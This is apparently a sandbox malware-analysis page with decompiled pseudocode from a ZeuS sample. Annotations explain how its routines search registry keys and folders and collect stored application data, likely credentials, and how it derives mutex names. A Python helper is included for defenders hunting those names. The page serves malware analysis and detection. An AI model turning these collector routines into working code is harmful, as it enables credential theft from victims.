						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {                                          // the HRESULT (S_OK), shown by the decompiler as _t42
							_t54 =  &_v16;
							E0040A91B( &_v636,  &_v16, _t68, 1, 2, E00413AED,  &_v12, 0, 0, 0);   // search the folder for the pattern, E00413AED per match (reading of the arguments)
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

APIs
    • Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F
  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 00413D3D
  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 00413D8D
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: EnvironmentExpandFolderOpenPathStrings
  • String ID: #$&
  • API String ID: 1994525040-3870246384
  • Opcode ID: af361530765df1ac0f1c1aef78eab0b445f8e063f527b8b5416979d442620232
  • Instruction ID: 214b6e7a3599988819771498a99bed2cb4bbc81edda79e9dabce594bd7e0e267
  • Opcode Fuzzy Hash: af361530765df1ac0f1c1aef78eab0b445f8e063f527b8b5416979d442620232
  • Instruction Fuzzy Hash: 39316DB2D00218AADF10AEE1AC89EDE777CEB04319F10457AF601F7190D6786B898B94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%
			E0041458B(void* __ecx, char* __edx, void* __eflags) {
				// Same collector structure as E00413CDB for a second target application: string
				// table entries 0x77-0x7a, registry lookup under HKEY_CURRENT_USER, then a folder
				// search in the order AppData, Program Files, common AppData.
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				char _v68;
				char _v120;
				char _v644;
				short _v1164;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E00405299( &_v12,  &_v12, 0, 8);                                 // zero the result list {_v12 = buffer, _v8 = count}
				_t28 = 0x77;
				E0040F34A(_t28,  &_v120);                                        // string #0x77: registry subkey
				_t30 = 0x78;
				E0040F34A(_t30,  &_v44);                                         // string #0x78: value name
				_t55 =  &_v644;
				_t35 = E0040930A(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);   // read the value from HKEY_CURRENT_USER
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
						E0041432E(_t65,  &_v1164,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {                                              // _t70 is _v8
						return E004051E6(_v12);                                  // free the buffer
					}
					_push(0xcb);
					return E0041293E(_t54, _v12, 0x7a);                          // report (tag 0x7a, type 0xcb)
				} else {
					_t60 =  &_v68;
					_t39 = 0x79;
					E0040F34A(_t39, _t60);                                       // string #0x79: file name pattern
					_v28 = 0x1a;                                                 // CSIDL_APPDATA
					_v24 = 0x26;                                                 // CSIDL_PROGRAM_FILES
					_v20 = 0x23;                                                 // CSIDL_COMMON_APPDATA
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v644;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {                                          // S_OK
							_t54 =  &_v16;
							E0040A91B( &_v644,  &_v16, _t68, 1, 2, E00414366,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

APIs
    • Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F
  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 004145ED
  • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 0041463D
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: EnvironmentExpandFolderOpenPathStrings
  • String ID: #$&
  • API String ID: 1994525040-3870246384
  • Opcode ID: fb1fcc6b599b22b6f88ed84e9769d99373cddc3cd047dc1b700b94009f82151f
  • Instruction ID: f45ae4ae41c08c08f0bb2dadcaa3525976364251704845c549422b65bc96e149
  • Opcode Fuzzy Hash: fb1fcc6b599b22b6f88ed84e9769d99373cddc3cd047dc1b700b94009f82151f
  • Instruction Fuzzy Hash: 12314FB2D00218AADF509AA19C89EDF777CEB44318F10457AF605F7180DA786A898BA5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 64%
			E0040983F(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
				// Builds a kernel-object name: a 16-byte GUID-like seed (*_a4) is masked with
				// per-installation values, optionally mixed with 0x102 bytes of caller data (_a12),
				// prefixed with "Local\" (_a16 == 1) or "Global\" (_a16 == 2) and rendered by
				// StringFromGUID2 into the buffer at __ecx. The 8-byte aligned frame below makes
				// the decompiler's stack-variable offsets approximate.
				char _v268;
				char _v280;
				char _v284;
				signed int _v290;
				signed int _v292;
				signed int _v296;
				unsigned int _t24;
				void* _t26;
				signed int _t28;
				char* _t29;
				void* _t30;
				void* _t41;
				char* _t42;
				void* _t46;
				signed int _t50;
				void* _t51;
				signed int _t52;
				void* _t54;

				_t54 = (_t52 & 0xfffffff8) - 0x118;                              // aligned frame
				_t46 = __ecx;                                                    // output buffer
				_t24 = E00405222( &_v284, _a4, 0x10);                            // copy the 16-byte seed; the return value is then used as a 32-bit mask
				_v296 = _v296 ^ _t24;                                            // mask the first dword ...
				_v292 = _v292 ^ _t24;                                            // ... and the second ...
				_v290 = _v290 ^ _t24 >> 0x00000010;                              // ... then undo the high word of the second
				_t41 = 0;
				_t26 = 0;
				do {                                                             // XOR bytes 8..15 with a 4-byte key, repeated cyclically
					_t10 = _t26 + 0xc; // 0x423c28
					 *(_t54 + _t41 + 0x10) =  *(_t54 + _t41 + 0x10) ^  *(_t51 + _t10);   // key bytes at 0x423c28 (+0xc of the object in _t51)
					_t26 = _t26 + 1;
					if(_t26 == 4) {
						_t26 = 0;
					}
					_t41 = _t41 + 1;
				} while (_t41 < 8);
				if(_a12 != 0) {
					E00405222( &_v268, _a12, 0x102);                             // append 0x102 bytes of caller data ...
					E00406662( &_v280, _t41,  &_v296, 0x10);                     // ... and fold them into the 16-byte value (E00406662 is not shown on the page)
				}
				_t28 = _a16 & 0x000000ff;
				if(_t28 != 0) {
					_t30 = _t28 - 1;
					if(_t30 == 0) {
						_t42 = L"Local\\";                                        // _a16 == 1: session-local namespace, 6 characters
						_push(6);
						goto L11;
					} else {
						if(_t30 == 1) {
							_t42 = L"Global\\";                                   // _a16 == 2: global namespace, 7 characters
							_push(7);
							L11:
							_pop(_t50);
							E00405587(_t50, _t42, _t46);                         // copy the prefix into the output buffer
							_t46 = _t46 + _t50 * 2;                              // advance past it (wide characters)
						}
					}
				}
				_t29 =  &_v284;
				__imp__StringFromGUID2(_t29, _t46, 0x28);                        // "{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}", 0x28 = 40 characters of room
				return _t29;
			}

APIs
  • StringFromGUID2.OLE32(?,2937498D,00000028,?,?,00000010,00000000,77E49EB0), ref: 004098E5
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: FromString
  • String ID: (<B$Global\$Local\
  • API String ID: 1694596556-3709893674
  • Opcode ID: 499d82d82ff1a61b49700400b8527ddd0283d798db0361c206ef461b4f62b386
  • Instruction ID: 7161f8ffbd1ff4f8598d19e9a28633fef4e7433de9ddb5ed9ea82c69b161057f
  • Opcode Fuzzy Hash: 499d82d82ff1a61b49700400b8527ddd0283d798db0361c206ef461b4f62b386
  • Instruction Fuzzy Hash: 6B115232124309A7C714EE349805AEB7799EB85714F04CD3FF482E62C2DBB8C904CB9A
Uniqueness

Uniqueness Score: -1.00%
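What a defender most wants from 0x0040983F is the ability to turn a recovered seed into the concrete mutex and event names to hunt for on other hosts. The Python below is an added example written for this page, not code from the sample or from Joe Sandbox. It transcribes the XOR steps as they read in the listing (the aligned frame makes the decompiler's offsets approximate, so treat the byte positions as a reading rather than a proof), uses `uuid.UUID(bytes_le=...)` to reproduce the field order StringFromGUID2 prints, and applies the `Local\` / `Global\` prefix selected by `_a16`. The 32-bit mask `key` and the 4-byte `extra_key` are plain inputs here because their sources (the value returned by E00405222 and the bytes at 0x423c28) are not shown on the page, and the optional 0x102-byte mixing step through E00406662 is not reproduced.

```python
import struct
import uuid

# Values of the _a16 argument at 0x0040983F.
SCOPE_NONE, SCOPE_LOCAL, SCOPE_GLOBAL = 0, 1, 2
PREFIXES = {SCOPE_LOCAL: "Local\\", SCOPE_GLOBAL: "Global\\"}


def mask_seed(seed, key, extra_key=b"\x00" * 4):
    """Apply the XOR steps of 0x0040983F to the 16-byte seed.

    `key` is the 32-bit value the sample XORs in (returned by E00405222 in the
    listing); `extra_key` stands for the 4 bytes at 0x423c28 that are XORed
    cyclically into bytes 8..15. Both are assumed inputs in this example.
    """
    if len(seed) != 16 or len(extra_key) != 4:
        raise ValueError("seed must be 16 bytes and extra_key 4 bytes")
    buf = bytearray(seed)
    k = struct.pack("<I", key & 0xFFFFFFFF)
    for i in range(4):
        buf[i] ^= k[i]          # _v296 ^= key   (dword at +0)
        buf[4 + i] ^= k[i]      # _v292 ^= key   (dword at +4)
    hi = struct.pack("<H", (key >> 16) & 0xFFFF)
    buf[6] ^= hi[0]             # _v290 ^= key >> 16 (word at +6): cancels the
    buf[7] ^= hi[1]             # previous XOR on bytes 6..7, leaving them unmasked
    for i in range(8):          # the do/while loop: _t41 = 0..7, key index _t26 = 0..3
        buf[8 + i] ^= extra_key[i % 4]
    return bytes(buf)


def guid_string(raw16):
    """Render 16 bytes the way StringFromGUID2 does: braces, upper-case hex,
    first three fields read little-endian."""
    return "{%s}" % str(uuid.UUID(bytes_le=raw16)).upper()


def derive_object_name(seed, key, scope, extra_key=b"\x00" * 4):
    """Full name as written to the caller's buffer: optional namespace prefix
    followed by the GUID string."""
    return PREFIXES.get(scope, "") + guid_string(mask_seed(seed, key, extra_key))


if __name__ == "__main__":
    # Constructed demo seed; a real value would be recovered from an infected host.
    demo_seed = bytes(range(16))
    for scope in (SCOPE_NONE, SCOPE_LOCAL, SCOPE_GLOBAL):
        print(derive_object_name(demo_seed, 0x19367402, scope))
```

Once the per-host inputs are known, the three outputs above are the literal strings to look for with a handle enumeration tool or in EDR telemetry; the `Global\` form is the one visible from every session on the machine.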

C-Code - Quality: 86%
			E0040A5F2(WCHAR* _a4) {
				// Creates a fresh directory named "tmp%08x" under %TEMP% and returns its path in _a4.
				// Up to 100 candidate names are tried; the number comes from the GetTickCount-seeded PRNG.
				short _v524;
				char _v1044;
				void* __edi;
				void* _t11;
				void* _t19;
				void* _t20;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {                     // unsigned trick: rejects 0 (error) and anything above 0xf6 (buffer too small)
					L6:
					return 0;
				}
				_t19 = 0;                                                        // attempt counter
				while(1) {
					_push(E0040651F());                                          // random 32-bit value
					_push(L"tmp");
					_t18 =  &_v1044;
					_t11 = E00405ED9(_t10, 0x104,  &_v1044, L"%s%08x");          // printf-style formatting: "tmp" followed by 8 hex digits
					_t20 = _t20 + 0xc;                                           // caller cleans the three pushed arguments
					if(_t11 == 0xffffffff) {
						goto L6;
					}
					if(E0040AA77(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {   // PathCombineW(temp, name) in the subcall, then create; on collision try again
						_t19 = _t19 + 1;
						if(_t19 < 0x64) {                                        // 100 attempts
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

APIs
  • GetTempPathW.KERNEL32(000000F6,?), ref: 0040A609
    • Part of subcall function 0040651F: GetTickCount.KERNEL32 ref: 0040651F
    • Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96
  • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 0040A65B
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Path$CombineCountCreateDirectoryTempTick
  • String ID: %s%08x$tmp
  • API String ID: 1218007593-1196434543
  • Opcode ID: bb31670772de6c1eb392241ed9b70bb9287dd5ac4efaa5539050ac323ba3b127
  • Instruction ID: 139d025d2dd241ed87d6771c4b5f5ec639d4d71d2da21ef8c281398e2a7f987a
  • Opcode Fuzzy Hash: bb31670772de6c1eb392241ed9b70bb9287dd5ac4efaa5539050ac323ba3b127
  • Instruction Fuzzy Hash: 61F02D7120031466DA206A34DC05FEF7768C741718F180533FD95F61E1D27A8EE69A9F
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040A7F9(WCHAR* _a4) {
				signed int _t4;
				short _t9;
				signed short _t10;
				WCHAR* _t11;
				WCHAR* _t12;
				int _t18;

				_t12 = _a4;
				_t9 = 0;
				_t11 = PathSkipRootW(_t12);
				if(_t11 == 0) {
					_t11 = _t12;
				}
				while(1) {
					_t4 =  *_t11 & 0x0000ffff;
					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
						goto L5;
					}
					L11:
					_t11 =  &(_t11[1]);
					continue;
					L5:
					_t10 = _t4;
					 *_t11 = 0;
					if(GetFileAttributesW(_t12) == 0xffffffff) {
						_t18 = CreateDirectoryW(_t12, 0);
					}
					if(_t18 == 0) {
						L13:
						return _t9;
					} else {
						if(_t10 == 0) {
							_t9 = 1;
							goto L13;
						}
						 *_t11 = _t10;
						goto L11;
					}
				}
			}

APIs
  • PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,0040C9EF,?,?,?,?,?), ref: 0040A804
  • GetFileAttributesW.KERNEL32(?,?,00000000,0040C9EF,?,?,?,?,?), ref: 0040A82C
  • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0040C9EF,?,?,?,?,?), ref: 0040A83A
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: AttributesCreateDirectoryFilePathRootSkip
  • String ID: .exe
  • API String ID: 4231520044-4119554291
  • Opcode ID: ed3e46544acc2824961a0ef503d825023dfcaf4f981307dc54091fb16494e904
  • Instruction ID: 33e2b0bd42c5d5e5787d7ff03aec3e0a0d4f1000ed751113e9a59a64727ec0fe
  • Opcode Fuzzy Hash: ed3e46544acc2824961a0ef503d825023dfcaf4f981307dc54091fb16494e904
  • Instruction Fuzzy Hash: 9FF0F6339403105AC6303A295848AB773D89E517A4B55C93BFCA4F73E0E7389C63926F
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E004069ED(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetModuleHandleW(L"kernel32.dll");
				if(_t7 == 0) {
					L4:
					return _t7 & 0xffffff00 | _v8 != 0x00000000;
				} else {
					_t7 = GetProcAddress(_t7, "IsWow64Process");
					if(_t7 == 0) {
						goto L4;
					} else {
						_t7 = _t7->i(0xffffffff,  &_v8);
						if(_t7 != 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

APIs
  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041C23D,00000000,0041C766), ref: 004069FA
  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00406A0A
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: AddressHandleModuleProc
  • String ID: IsWow64Process$kernel32.dll
  • API String ID: 1646373207-3024904723
  • Opcode ID: 00cc24325cc45010761ca123a02b10ec910306b1236abef4d389b43a25b1facf
  • Instruction ID: 0b0cfa3c612c614562886ec526036be26822eabab4639b6267781e256903af10
  • Opcode Fuzzy Hash: 00cc24325cc45010761ca123a02b10ec910306b1236abef4d389b43a25b1facf
  • Instruction Fuzzy Hash: 4DE04830350206B6DF109BA5DD06B9F76DCDB0D799F144675A011F60D0DB78DB149518
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00416C1F(void* _a4) {
				void* __esi;
				int _t7;

				_t11 = _a4;
				_t7 = InternetCloseHandle(_a4);
				if(E0041CAA4() != 0) {
					EnterCriticalSection(0x423420);
					if(E00415D7F(_t11) != 0xffffffff) {
						E00415E42(_t5);
					}
					LeaveCriticalSection(0x423420);
				}
				return _t7;
			}

APIs
  • InternetCloseHandle.WININET(?), ref: 00416C26
    • Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC
  • EnterCriticalSection.KERNEL32(00423420), ref: 00416C3E
  • LeaveCriticalSection.KERNEL32(00423420), ref: 00416C54
    • Part of subcall function 00415E42: CloseHandle.KERNEL32(?), ref: 00415E55
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CloseCriticalHandleSection$EnterInternetLeaveObjectSingleWait
  • String ID: 4B
  • API String ID: 51871400-3841215673
  • Opcode ID: 9c4065c2755f8b4a13e1f502e9a86cf31297799995a6daf2f4fbeb1a3d9ffbb3
  • Instruction ID: 4026f98f2cdf6062607bbe22f45a9c874cfbbf497fedaef4514eef2ca1097094
  • Opcode Fuzzy Hash: 9c4065c2755f8b4a13e1f502e9a86cf31297799995a6daf2f4fbeb1a3d9ffbb3
  • Instruction Fuzzy Hash: 81E026312015005B86017738AC884DF236CDD85339301827FF410F32718B3C8C82426D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
			E00414D5A(char* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v68;
				char _v88;
				char _v108;
				char _v132;
				char _v172;
				short _v260;
				short _v780;
				void* __edi;
				void* __esi;
				intOrPtr _t65;
				intOrPtr _t92;
				int _t104;
				void* _t110;
				intOrPtr _t112;
				void* _t115;
				int _t120;
				void* _t125;
				void* _t132;
				void* _t135;
				void* _t136;

				_t119 = __edx;
				_t118 = __ecx;
				_t120 = 0;
				E00405299( &_v32,  &_v32, 0, 8);
				_t65 = E004051B6(0xc1c);
				_v16 = _t65;
				if(_t65 == 0) {
					L22:
					if(_v28 <= _t120) {
						return E004051E6(_v32);
					}
					return E0041293E(_t119, _v32, 0xcb);
				} else {
					_v36 = _t65 + 0x3fc;
					_v48 = 0x80000001;
					_v44 = 0x80000002;
					E0040F34A(0x8a,  &_v260);
					E0040F34A(0x8b,  &_v88);
					E0040F34A(0x8c,  &_v132);
					E0040F34A(0x8d,  &_v68);
					E0040F34A(0x8e,  &_v108);
					_v12 = 0;
					do {
						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
							goto L20;
						}
						_v24 = _t120;
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
							L19:
							RegCloseKey(_v8);
							goto L20;
						} else {
							goto L4;
						}
						L17:
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
							L4:
							_t122 = _v16;
							_v24 = _v24 + 1;
							_t92 = E0040930A(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
							_v40 = _t92;
							if(_t92 != 0xffffffff && _t92 != 0) {
								_t132 = E0040930A(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
								if(_t132 != 0xffffffff && _t132 != 0) {
									_t124 = _v36;
									_t104 = E0040930A(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
									_v20 = _t104;
									if(_t104 != 0xffffffff && _t104 != 0 && E00414CA0(_t119, _t124, _t132 + _v40) > 0) {
										_t125 = E004093C0(_v8, _t118,  &_v780,  &_v132);
										if(_t125 < 1 || _t125 > 0xffff) {
											_t125 = 0x15;
										}
										_t134 =  &_v172;
										_t110 = 0x55;
										E0040F34A(_t110,  &_v172);
										_t112 = _v16;
										_t118 = _v36;
										_push(_t125);
										_push(_t112);
										_push(_t118);
										_push(_t112 + 0x1fe);
										_t119 = 0x311;
										_t126 = _t118 + 0x1fe;
										_t115 = E00405ED9(_t134, 0x311, _t118 + 0x1fe, _t134);
										_t136 = _t136 + 0x14;
										if(_t115 > 0) {
											_t118 =  &_v32;
											if(E004055DA(_t115,  &_v32, _t126) != 0) {
												_v28 = _v28 + 1;
											}
										}
									}
								}
							}
							goto L17;
						} else {
							_t120 = 0;
							goto L19;
						}
						L20:
						_v12 = _v12 + 1;
					} while (_v12 < 2);
					E004051E6(_v16);
					goto L22;
				}
			}

APIs
  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 00414E00
  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00414E2B
  • RegCloseKey.ADVAPI32(?), ref: 00414F61
    • Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F
  • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 00414F4E
    • Part of subcall function 0040930A: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041C0F5,?,?,00000104), ref: 004093A0
    • Part of subcall function 004093C0: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00415F8F,?,?), ref: 004093D8
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Open$Enum$CloseEnvironmentExpandStrings
  • String ID:
  • API String ID: 2343474859-0
  • Opcode ID: f3240d822413627c5225ad033ed73e9df4a8cfaf27c4753abfc90ccb89456b65
  • Instruction ID: 60cc3da068c8a4770b33859c71885b65dc5d4fba704e26724153497e60cf3e94
  • Opcode Fuzzy Hash: f3240d822413627c5225ad033ed73e9df4a8cfaf27c4753abfc90ccb89456b65
  • Instruction Fuzzy Hash: 3C515172900118ABDB10DBD5DD45AEFB7BCEB88314F104176F905F7291D738AE868B64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
			E004152EE(char* __ecx, void* __eflags) {
				void* _v8;
				int _v12;
				intOrPtr _v16;
				int* _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v116;
				short _v180;
				short _v700;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				int _t81;
				int _t89;
				int _t93;
				void* _t99;
				intOrPtr _t101;
				void* _t104;
				int* _t109;
				char* _t113;
				void* _t114;
				void* _t122;

				_t107 = __ecx;
				_t109 = 0;
				E00405299( &_v28,  &_v28, 0, 8);
				_t55 = E004051B6(0xc1c);
				_v16 = _t55;
				if(_t55 == 0) {
					return _t55;
				}
				_v32 = _t55 + 0x3fc;
				E0040F34A(0x97,  &_v180);
				E0040F34A(0x98,  &_v64);
				E0040F34A(0x99,  &_v76);
				E0040F34A(0x9a,  &_v52);
				E0040F34A(0x9b,  &_v40);
				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
					L20:
					E004051E6(_v16);
					if(_v24 <= _t109) {
						return E004051E6(_v28);
					}
					return E0041293E(0x311, _v28, 0xcb);
				}
				_v20 = 0;
				_v12 = 0x104;
				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
					L19:
					RegCloseKey(_v8);
					goto L20;
				} else {
					do {
						_t111 = _v16;
						_v20 = _v20 + 1;
						_t81 = E0040930A(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
						_v12 = _t81;
						if(_t81 != 0xffffffff && _t81 != 0) {
							_t89 = E0040930A(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
							_v12 = _t89;
							if(_t89 != 0xffffffff && _t89 != 0) {
								_t113 = _v32;
								_t93 = E0040930A(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
								_v12 = _t93;
								if(_t93 != 0xffffffff && _t93 != 0) {
									_t107 = _t113;
									if(E00405D35(_t113) > 0) {
										_t114 = E004093C0(_v8, _t107,  &_v700,  &_v76);
										if(_t114 < 1 || _t114 > 0xffff) {
											_t114 = 0x15;
										}
										_t121 =  &_v116;
										_t99 = 0x55;
										E0040F34A(_t99,  &_v116);
										_t101 = _v16;
										_t107 = _v32;
										_push(_t114);
										_push(_t101);
										_push(_t107);
										_push(_t101 + 0x1fe);
										_t115 = _t107 + 0x1fe;
										_t104 = E00405ED9(_t121, 0x311, _t107 + 0x1fe, _t121);
										_t122 = _t122 + 0x14;
										if(_t104 > 0) {
											_t107 =  &_v28;
											if(E004055DA(_t104,  &_v28, _t115) != 0) {
												_v24 = _v24 + 1;
											}
										}
									}
								}
							}
						}
						_v12 = 0x104;
					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
					_t109 = 0;
					goto L19;
				}
			}

APIs
  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0041537C
  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004153A7
  • RegCloseKey.ADVAPI32(?), ref: 004154DE
    • Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F
  • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 004154CB
    • Part of subcall function 0040930A: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041C0F5,?,?,00000104), ref: 004093A0
